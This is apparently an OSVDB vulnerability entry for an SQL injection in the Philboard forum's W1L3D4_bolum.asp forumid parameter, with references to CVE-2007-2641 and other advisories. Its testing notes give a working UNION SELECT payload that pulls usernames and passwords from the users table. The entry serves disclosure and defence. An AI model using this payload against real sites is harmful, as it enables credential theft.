Philboard W1L3D4_bolum.asp forumid Variable SQL Injection

2007-05-11T07:33:57
ID OSVDB:35679
Type osvdb
Reporter OSVDB
Modified 2007-05-11T07:33:57

Description

Manual Testing Notes

/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

References:

Secunia Advisory ID:25265 Other Advisory URL: http://www.kerem125.com/portal/?p=18 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0179.html ISS X-Force ID: 34245 Generic Exploit URL: http://www.milw0rm.com/exploits/3905 FrSIRT Advisory: ADV-2007-1789 CVE-2007-2641 Bugtraq ID: 23945